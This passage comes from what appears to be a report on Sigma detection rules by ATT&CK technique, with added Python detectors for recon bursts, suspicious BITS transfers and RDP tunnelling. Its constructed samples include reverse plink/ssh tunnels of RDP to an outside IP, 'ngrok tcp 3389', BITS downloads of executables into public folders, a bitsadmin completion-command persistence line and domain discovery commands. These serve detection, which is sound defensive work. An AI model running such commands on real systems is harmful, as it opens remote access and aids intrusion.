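    This is the count()-by-host-over-timeframe aggregation that Sigma
    expresses declaratively: a lone `whoami` is noise, five different
    discovery commands in twenty seconds is a script or an implant.
    """
    by_host = defaultdict(list)
    for ts, host, cmdline in events:
        names = classify_recon(cmdline)
        if names:
            by_host[host].append((ts, names))

    alerts = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _) in enumerate(hits):
            seen = set()
            for ts, names in hits[i:]:
                if ts - start > window:
                    break
                seen |= names
            if len(seen) >= threshold:
                alerts.append((host, start, sorted(seen)))
                break  # one alert per host is enough for the example
    return alerts


# Constructed process-creation events: WS01 mimics an automated collector
# (Pikabot-style, under a minute); WS02 is an admin poking around.
T0 = datetime(2024, 5, 1, 9, 0, 0)
EVENTS = [
    (T0, "WS01", "C:\\Windows\\System32\\whoami.exe /all"),
    (T0 + timedelta(seconds=3), "WS01", "ipconfig /all"),
    (T0 + timedelta(seconds=7), "WS01", 'net group "domain admins" /domain'),
    (T0 + timedelta(seconds=12), "WS01", "nltest /dclist:corp.example"),
    (T0 + timedelta(seconds=20), "WS01", "nltest /domain_trusts /all_trusts"),
    (T0 + timedelta(seconds=25), "WS01", "notepad.exe C:\\Users\\bob\\notes.txt"),
    (T0, "WS02", "ipconfig /all"),
    (T0 + timedelta(minutes=45), "WS02", "systeminfo"),
]

if __name__ == "__main__":
    for host, start, names in detect_recon_bursts(EVENTS):
        print(f"{host} {start:%H:%M:%S} recon burst: {', '.join(names)}")
```

Counting distinct primitives rather than raw events is what keeps a login script that runs `ipconfig /all` five times from alerting; the per-host grouping is what lets the same five commands spread over an afternoon by an administrator stay quiet.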
attack.t1197 18
  • Suspicious Bitsadmin Job via PowerShell - Level: high
    Description: Detect download by BITS jobs via PowerShell
  • Suspicious Bitstransfer via PowerShell - Level: medium
    Description: Detects transferring files from a system to a server using the BitsTransfer PowerShell cmdlets
  • Bitsadmin to Uncommon IP Server Address - Level: high
    Description: Detects Bitsadmin connections to IP addresses instead of FQDN names
  • Bitsadmin to Uncommon TLD - Level: high
    Description: Detects Bitsadmin connections to domains with uncommon TLDs
  • New BITS Job Created Via Bitsadmin - Level: low
    Description: Detects the creation of a new bits job by Bitsadmin
  • New BITS Job Created Via PowerShell - Level: low
    Description: Detects the creation of a new bits job by PowerShell
  • BITS Transfer Job Downloading File Potential Suspicious Extension - Level: medium
    Description: Detects new BITS transfer job saving local files with potential suspicious extensions
  • BITS Transfer Job Download From File Sharing Domains - Level: high
    Description: Detects BITS transfer job downloading files from a file sharing domain.
  • BITS Transfer Job Download From Direct IP - Level: high
    Description: Detects a BITS transfer job downloading file(s) from a direct IP address.
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD - Level: medium
    Description: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
  • BITS Transfer Job Download To Potential Suspicious Folder - Level: high
    Description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location
  • Suspicious Download From Direct IP Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file using a URL that contains an IP
  • File Download Via Bitsadmin - Level: medium
    Description: Detects usage of bitsadmin downloading a file
  • Suspicious Download From File-Sharing Website Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file from a suspicious domain
  • File With Suspicious Extension Downloaded Via Bitsadmin - Level: high
    Description: Detects usage of bitsadmin downloading a file with a suspicious extension
  • File Download Via Bitsadmin To A Suspicious Target Folder - Level: high
    Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
  • File Download Via Bitsadmin To An Uncommon Target Folder - Level: medium
    Description: Detects usage of bitsadmin downloading a file to uncommon target folder
  • Monitoring For Persistence Via BITS - Level: medium
    Description: BITS allows a command to be scheduled to execute after a successful download, as a notification that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. Actors can abuse this to create a backdoor within the system and for persistence, chaining a BITS job that downloads malware or additional binaries and then executes the program once downloaded.
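The attack.t1197 rules above are variations on a small set of checks against BITS transfer records and bitsadmin command lines: the remote URL is a bare IP, a known file-sharing host or an uncommon TLD; the local file carries an executable extension or lands in a world-writable folder; and /SetNotifyCmdLine attaches a program to run on completion. The Python below is an added example written for this report, not code from the Sigma project, that applies those checks to constructed records. The RemoteName/LocalName field names follow the BITS-Client event; the domain, TLD, extension and folder lists are illustrative assumptions, not the rules' actual lists.

```python
"""Added example: triaging BITS transfer jobs and bitsadmin command lines.

Not part of the SigmaTACT report or the Sigma rules it summarises. Records
are constructed; the domain, TLD, extension and folder lists are illustrative.
"""
import ipaddress
import re
from urllib.parse import urlparse

# Constructed BITS-Client operational log records. RemoteName is the source
# URL and LocalName the destination path, as in the Windows event.
EVENTS = [
    {"RemoteName": "http://203.0.113.7/update/svc.exe",
     "LocalName": "C:\\Users\\Public\\svc.exe"},
    {"RemoteName": "https://transfer.sh/abc123/report.dll",
     "LocalName": "C:\\Users\\bob\\AppData\\Local\\Temp\\report.dll"},
    {"RemoteName": "https://download.windowsupdate.com/d/msdownload/update/x.cab",
     "LocalName": "C:\\Windows\\SoftwareDistribution\\Download\\x.cab"},
    {"RemoteName": "http://files.example.xyz/invoice.pdf",
     "LocalName": "C:\\Users\\bob\\Downloads\\invoice.pdf"},
]

# Illustrative lists (assumptions for the example, not the Sigma lists).
FILE_SHARING_DOMAINS = {"transfer.sh", "temp.sh", "anonfiles.com", "pastebin.com"}
COMMON_TLDS = {"com", "net", "org", "gov", "edu", "io", "de", "uk"}
SUSPICIOUS_EXTENSIONS = {".exe", ".dll", ".ps1", ".bat", ".vbs", ".hta", ".scr"}
SUSPICIOUS_FOLDERS = ("\\users\\public\\", "\\appdata\\local\\temp\\",
                      "\\programdata\\", "\\windows\\temp\\")


def classify_transfer(event):
    """Return the list of checks a BITS transfer record trips, in order."""
    findings = []
    host = urlparse(event["RemoteName"]).hostname or ""
    local = event["LocalName"].lower()

    # Where the file came from: bare IP, file-sharing host or odd TLD.
    try:
        ipaddress.ip_address(host)
        findings.append("direct_ip")
    except ValueError:
        if host in FILE_SHARING_DOMAINS:
            findings.append("file_sharing_domain")
        elif host.rsplit(".", 1)[-1] not in COMMON_TLDS:
            findings.append("uncommon_tld")

    # What was written and where.
    name = local.rsplit("\\", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    if ext in SUSPICIOUS_EXTENSIONS:
        findings.append("suspicious_extension")
    if any(folder in local for folder in SUSPICIOUS_FOLDERS):
        findings.append("suspicious_folder")
    return findings


def severity(findings):
    """Rough mapping onto Sigma levels: suspicious source plus sink is high."""
    source = {"direct_ip", "file_sharing_domain", "uncommon_tld"} & set(findings)
    sink = {"suspicious_extension", "suspicious_folder"} & set(findings)
    if source and sink:
        return "high"
    if source or sink:
        return "medium"
    return None


# bitsadmin /SetNotifyCmdLine runs a program when the job completes, which
# is the persistence trick behind "Monitoring For Persistence Via BITS".
_NOTIFY_CMDLINE = re.compile(r"\bbitsadmin(?:\.exe)?\b.*\s/setnotifycmdline\b", re.I)


def bitsadmin_persistence(cmdline):
    """True if a bitsadmin command line attaches a completion command."""
    return bool(_NOTIFY_CMDLINE.search(cmdline))


if __name__ == "__main__":
    for ev in EVENTS:
        f = classify_transfer(ev)
        print(f"{severity(f) or 'clean':6} {f} <- {ev['RemoteName']}")
    print(bitsadmin_persistence(
        "bitsadmin /SetNotifyCmdLine job1 C:\\Users\\Public\\svc.exe NULL"))
```

The source/sink split mirrors how the rule levels above fall out: a bare-IP download on its own is medium, a bare-IP download of an .exe into C:\Users\Public is high, and a .cab from windowsupdate.com into SoftwareDistribution trips nothing.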
attack.t1216 17
  • Execution via CL_Invocation.ps1 - Powershell - Level: high
    Description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module
  • Execution via CL_Mutexverifiers.ps1 - Level: high
    Description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File - Level: medium
    Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
  • Suspicious CustomShellHost Execution - Level: medium
    Description: Detects the execution of the CustomShellHost binary where the child process isn't 'C:\Windows\explorer.exe'
  • Potential Manage-bde.wsf Abuse To Proxy Execution - Level: high
    Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
  • Execute Code with Pester.bat as Parent - Level: medium
    Description: Detects code execution via Pester.bat (Pester - PowerShell module for testing)
  • Execute Code with Pester.bat - Level: medium
    Description: Detects code execution via Pester.bat (Pester - PowerShell module for testing)
  • SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code - Level: medium
    Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
  • UtilityFunctions.ps1 Proxy Dll - Level: medium
    Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
  • Potential Process Execution Proxy Via CL_Invocation.ps1 - Level: medium
    Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"
  • Assembly Loading Via CL_LoadAssembly.ps1 - Level: medium
    Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass AppLocker controls.
  • Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 - Level: medium
    Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands
  • Uncommon Sigverif.EXE Child Process - Level: medium
    Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living-off-the-land binary in order to proxy execution.
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - Level: medium
    Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
  • Remote Code Execute via Winrm.vbs - Level: medium
    Description: Detects an attempt to execute code or create service on remote host via winrm.vbs.
  • Execution via CL_Invocation.ps1 (2 Lines) - Level: high
    Description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module
  • Execution via CL_Mutexverifiers.ps1 (2 Lines) - Level: high
    Description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
attack.t1572 17
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of data exfiltration by malicious actors
  • Communication To LocaltoNet Tunneling Service Initiated - Linux - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To LocaltoNet Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using ngrok to store their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
  • RDP Over Reverse SSH Tunnel - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address on TCP port 3389
  • RDP to HTTP or HTTPS Target Ports - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IB report
  • Cloudflared Tunnel Connections Cleanup - Level: medium
    Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
  • Cloudflared Tunnel Execution - Level: medium
    Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
  • Suspicious Plink Port Forwarding - Level: high
    Description: Detects suspicious Plink tunnel port forwarding to a local port
  • Potential RDP Tunneling Via Plink - Level: high
    Description: Execution of plink to perform data exfiltration and tunneling
  • PUA - 3Proxy Execution - Level: high
    Description: Detects the use of 3proxy, a tiny free proxy server
  • PUA - Ngrok Execution - Level: high
    Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
  • Potentially Suspicious Usage Of Qemu - Level: medium
    Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
  • Port Forwarding Activity Via SSH.EXE - Level: medium
    Description: Detects port forwarding activity via SSH.exe
  • Potential RDP Tunneling Via SSH - Level: high
    Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP
  • Tunneling Tool Execution - Level: medium
    Description: Detects the execution of well known tools that can be abused for data exfiltration and tunneling.
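The attack.t1572 rules split into two families. The network-event rules (RDP Over Reverse SSH Tunnel, RDP to HTTP or HTTPS Target Ports) look for the RDP service, svchost hosting termsvcs, talking to a loopback address or to port 80/443, which is what a reverse SSH or plink tunnel looks like from the host. The command-line rules (Suspicious Plink Port Forwarding, Port Forwarding Activity Via SSH.EXE, PUA - Ngrok Execution) look for tunnelling tools with -R/-L forwards that mention 3389, or ngrok tcp 3389. The Python below is an added example written for this report, not Sigma code, applying both checks to constructed Sysmon-style connection records and command lines; field names follow Sysmon Event ID 3 and the plain svchost.exe check stands in for a termsvcs service lookup.

```python
"""Added example: spotting RDP tunnelled through SSH, plink or ngrok.

Not part of the SigmaTACT report or the Sigma rules it summarises. The
connection records and command lines are constructed; field names follow
Sysmon Event ID 3 and the svchost check stands in for a termsvcs lookup.
"""
import ipaddress
import re

# Constructed Sysmon-style network connection records.
NET_EVENTS = [
    # RDP service talking to loopback: the far end is a local ssh/plink
    # forwarder, i.e. "RDP Over Reverse SSH Tunnel".
    {"Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": False,
     "SourceIp": "127.0.0.1", "SourcePort": 3389,
     "DestinationIp": "127.0.0.1", "DestinationPort": 49812},
    # RDP service talking to a remote port 443: "RDP to HTTP or HTTPS Target Ports".
    {"Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": False,
     "SourceIp": "10.0.0.5", "SourcePort": 3389,
     "DestinationIp": "203.0.113.5", "DestinationPort": 443},
    # Ordinary RDP session from a workstation on the LAN.
    {"Image": "C:\\Windows\\System32\\svchost.exe", "Initiated": False,
     "SourceIp": "10.0.0.5", "SourcePort": 3389,
     "DestinationIp": "10.0.0.23", "DestinationPort": 51234},
    # Unrelated process touching loopback.
    {"Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "Initiated": True,
     "SourceIp": "127.0.0.1", "SourcePort": 52000,
     "DestinationIp": "127.0.0.1", "DestinationPort": 3389},
]


def classify_connection(ev):
    """Label an inbound RDP-service connection that looks tunnelled, else None."""
    if ev["Initiated"] or not ev["Image"].lower().endswith("\\svchost.exe"):
        return None
    if ev["SourcePort"] != 3389:
        return None
    if ipaddress.ip_address(ev["DestinationIp"]).is_loopback:
        return "rdp_over_local_tunnel"
    if ev["DestinationPort"] in (80, 443):
        return "rdp_to_http_port"
    return None


# Tunnelling tools the command-line rules key on (illustrative subset).
_TUNNEL_TOOL = re.compile(r"(?:^|[\\/\s])(plink|ssh|ngrok|cloudflared)(?:\.exe)?\b", re.I)
# -R (reverse) / -L (local) forwards; case matters, since ssh -l is a login name.
_FORWARD = re.compile(r"\s-([RL])\s*(\S+)")


def classify_cmdline(cmdline):
    """Return findings for a tunnelling-tool command line (empty if none)."""
    m = _TUNNEL_TOOL.search(cmdline)
    if not m:
        return []
    tool = m.group(1).lower()
    findings = [f"tunnel_tool:{tool}"]
    for flag, spec in _FORWARD.findall(cmdline):
        findings.append("reverse_forward" if flag == "R" else "local_forward")
        if "3389" in spec:
            findings.append("rdp_forward")
    if tool == "ngrok" and re.search(r"\btcp\s+3389\b", cmdline):
        findings.append("rdp_forward")
    return findings


# Constructed command lines.
CMDLINES = [
    "plink.exe -R 3389:127.0.0.1:3389 user@203.0.113.5 -P 443 -pw hunter2",
    "C:\\Windows\\System32\\OpenSSH\\ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 user@203.0.113.5",
    "ssh.exe -L 8080:intranet.corp.example:80 admin@bastion.corp.example",
    "ngrok tcp 3389",
    "C:\\Windows\\System32\\svchost.exe -k netsvcs -p",
]

if __name__ == "__main__":
    for ev in NET_EVENTS:
        print(classify_connection(ev), ev["Image"].rsplit("\\", 1)[-1])
    for cl in CMDLINES:
        print(classify_cmdline(cl) or "clean", "<-", cl)
```

The loopback check will also fire on an administrator who tests RDP against localhost, and svchost alone is too broad in production: join the event to the service that owns the process (termsvcs) before alerting, as the rule descriptions above imply.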
attack.t1528 16
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Suspicious File Event With Teams Objects - Level: high
    Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
  • Delegated Permissions Granted For All Users - Level: high
    Description: Detects when highly privileged delegated permissions are granted on behalf of all users
  • End User Consent - Level: low
    Description: Detects when an end user consents to an application
  • End User Consent Blocked - Level: medium
    Description: Detects when end user consent is blocked due to risk-based consent.
  • App Granted Microsoft Permissions - Level: high
    Description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
  • Application URI Configuration Changes - Level: high
    Description: Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.
  • Anomalous Token - Level: high
    Description: Indicates that there are abnormal characteristics in the token, such as an unusual token lifetime or a token that is replayed from an unfamiliar location.
  • Anonymous IP Address - Level: high
    Description: Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.
  • Primary Refresh Token Access Attempt - Level: high
    Description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
  • Suspicious Teams Application Related ObjectAcess Event - Level: high
    Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
  • Microsoft Teams Sensitive File Access By Uncommon Applications - Level: medium
    Description: Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
  • HackTool - Koh Default Named Pipe - Level: critical
    Description: Detects creation of default named pipes used by the Koh tool
  • Renamed BrowserCore.EXE Execution - Level: high
    Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
  • Potentially Suspicious JWT Token Search Via CLI - Level: medium
    Description: Detects possible searches for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by Microsoft Office and similar apps.
  • Potentially Suspicious Command Targeting Teams Sensitive Files - Level: medium
    Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. The database might contain authentication tokens and other sensitive information about the logged in accounts.
attack.t1106 16
  • Lazarus Activity Apr21 - Level: high
    Description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
  • TA505 Dropper Load Pattern - Level: critical
    Description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
  • BPFDoor Abnormal Process ID or Lock File Accessed - Level: high
    Description: Detects access to BPFDoor .lock and .pid files in temporary file storage directories
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Potential WinAPI Calls Via PowerShell Scripts - Level: high
    Description: Detects use of WinAPI functions in PowerShell scripts
  • HackTool - CobaltStrike BOF Injection Pattern - Level: high
    Description: Detects a typical pattern of a CobaltStrike BOF which injects into other processes
  • HackTool - HandleKatz Duplicating LSASS Handle - Level: high
    Description: Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
  • Potential Direct Syscall of NtOpenProcess - Level: medium
    Description: Detects potential calls to NtOpenProcess directly from NTDLL.
  • Potential Binary Proxy Execution Via Cdb.EXE - Level: medium
    Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
  • HackTool - RedMimicry Winnti Playbook Execution - Level: high
    Description: Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility
  • HackTool - WinPwn Execution - Level: high
    Description: Detects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Mshta.EXE Execution Patterns - Level: high
    Description: Detects suspicious mshta process execution patterns
  • Potential WinAPI Calls Via CommandLine - Level: high
    Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
  • Turla Group Named Pipes - Level: critical
    Description: Detects a named pipe used by Turla group samples
  • WinAPI Library Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI libraries from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
  • WinAPI Function Calls Via PowerShell Scripts - Level: medium
    Description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts.
attack.t1018 16
  • Correct Execution of Nltest.exe - Level: high
    Description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
  • Linux Remote System Discovery - Level: low
    Description: Detects the enumeration of other remote systems.
  • Macos Remote System Discovery - Level: informational
    Description: Detects the enumeration of other remote systems.
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • DirectorySearcher Powershell Exploitation - Level: medium
    Description: Enumerates Active Directory to determine computers that are joined to the domain
  • Active Directory Computers Enumeration With Get-AdComputer - Level: low
    Description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.
  • Share And Session Enumeration Using Net.EXE - Level: low
    Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
  • Nltest.EXE Execution - Level: low
    Description: Detects nltest commands that can be used for information discovery
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • PUA - Adidnsdump Execution - Level: low
    Description: Detects execution of adidnsdump, a tool that enumerates and exports all DNS records in an Active Directory-integrated DNS zone via LDAP for internal network reconnaissance, and can also query or modify those records. Python 3 (python.exe) must be installed.
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.
  • Suspicious Scan Loop Network - Level: medium
    Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
  • Chopper Webshell Process Pattern - Level: high
    Description: Detects patterns found in process executions caused by China Chopper like tiny (ASPX) webshells
  • Webshell Hacking Activity Patterns - Level: high
    Description: Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
  • Webshell Detection With Command Line Keywords - Level: high
    Description: Detects certain command line parameters often used during reconnaissance activity via web shells
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1566 15
  • Search-ms and WebDAV Suspicious Indicators in URL - Level: high
    Description: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.
  • Potential Malicious Usage of CloudTrail System Manager - Level: high
    Description: Detects when System Manager successfully executes commands against an instance.
  • Okta FastPass Phishing Detection - Level: high
    Description: Detects when Okta FastPass prevents a known phishing site.
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
  • Download From Suspicious TLD - Blacklist - Level: low
    Description: Detects download of certain file types from hosts in suspicious TLDs
  • Download From Suspicious TLD - Whitelist - Level: low
    Description: Detects executable downloads from suspicious remote systems
  • Suspicious External WebDAV Execution - Level: high
    Description: Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious Microsoft OneNote Child Process - Level: high
    Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
  • Phishing Pattern ISO in Archive - Level: high
    Description: Detects cases in which an ISO file is opened within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of the Windows CVE-2021-31979 and CVE-2021-33771 vulnerabilities and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of the Windows CVE-2021-31979 and CVE-2021-33771 vulnerabilities and DevilsTongue malware by threat group Sourgum
  • WebDAV Temporary Local File Creation - Level: medium
    Description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
attack.s0002 15
Show Rules (15)
  • Credential Dumping Tools Accessing LSASS Memory - Level: high
    Description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credential dumping tools
  • Mimikatz Detection LSASS Access - Level: high
    Description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz versions that are however still used by different threat groups)
  • Mimikatz DC Sync - Level: high
    Description: Detects Mimikatz DC sync security events
  • Successful Overpass the Hash Attempt - Level: high
    Description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module.
  • HackTool - Generic Process Access - Level: high
    Description: Detects process access requests from hacktool processes based on their default image name
  • LSASS Memory Access by Tool With Dump Keyword In Name - Level: high
    Description: Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
  • Potential Credential Dumping Activity Via LSASS - Level: medium
    Description: Detects process access requests to the LSASS process with specific call trace calls and access masks. This behaviour is expressed by many credential dumping tools such as Mimikatz, NanoDump, Invoke-Mimikatz, Procdump and even the Taskmgr dumping feature.
  • Remote LSASS Process Access Through Windows Remote Management - Level: high
    Description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
  • Potentially Suspicious GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access requests to LSASS process with potentially suspicious access flags
  • Credential Dumping Attempt Via WerFault - Level: high
    Description: Detects LSASS process memory dumps using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for Win10, Server 2016 and up.
  • LSASS Access From Potentially White-Listed Processes - Level: high
    Description: Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
  • LSASS Access From Program In Potentially Suspicious Folder - Level: medium
    Description: Detects process access to LSASS memory with suspicious access flags and from a potentially suspicious folder
  • Uncommon GrantedAccess Flags On LSASS - Level: medium
    Description: Detects process access to LSASS memory with uncommon access flags 0x410 and 0x01410
  • Mimikatz In-Memory - Level: medium
    Description: Detects certain DLL loads when Mimikatz gets executed
attack.t1016 15
Show Rules (15)
  • Correct Execution of Nltest.exe - Level: high
    Description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions.
  • OpenCanary - SNMP OID Request - Level: high
    Description: Detects instances where an SNMP service on an OpenCanary node has had an OID request.
  • System Network Discovery - Linux - Level: informational
    Description: Detects enumeration of local network configuration
  • System Network Discovery - macOS - Level: informational
    Description: Detects enumeration of local network configuration
  • Cisco Discovery - Level: low
    Description: Find information about network devices that is not stored in config files
  • Suspicious Network Connection to IP Lookup Service APIs - Level: medium
    Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
  • Firewall Configuration Discovery Via Netsh.EXE - Level: low
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Nltest.EXE Execution - Level: low
    Description: Detects nltest commands that can be used for information discovery
  • Potential Recon Activity Via Nltest.EXE - Level: medium
    Description: Detects nltest commands that can be used for information discovery
  • Suspicious Network Command - Level: low
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • Potential Pikabot Discovery Activity - Level: high
    Description: Detects system discovery activity carried out by Pikabot, including network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
  • Userdomain Variable Enumeration - Level: low
    Description: Detects suspicious enumeration of the domain the user is associated with.
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet - Level: low
    Description: Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
  • Potential Network Enumeration on AWS - Level: low
    Description: Detects network enumeration performed on AWS.
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1133 15
Show Rules (15)
  • OpenCanary - SSH Login Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a login attempt.
  • OpenCanary - SSH New Connection Attempt - Level: high
    Description: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
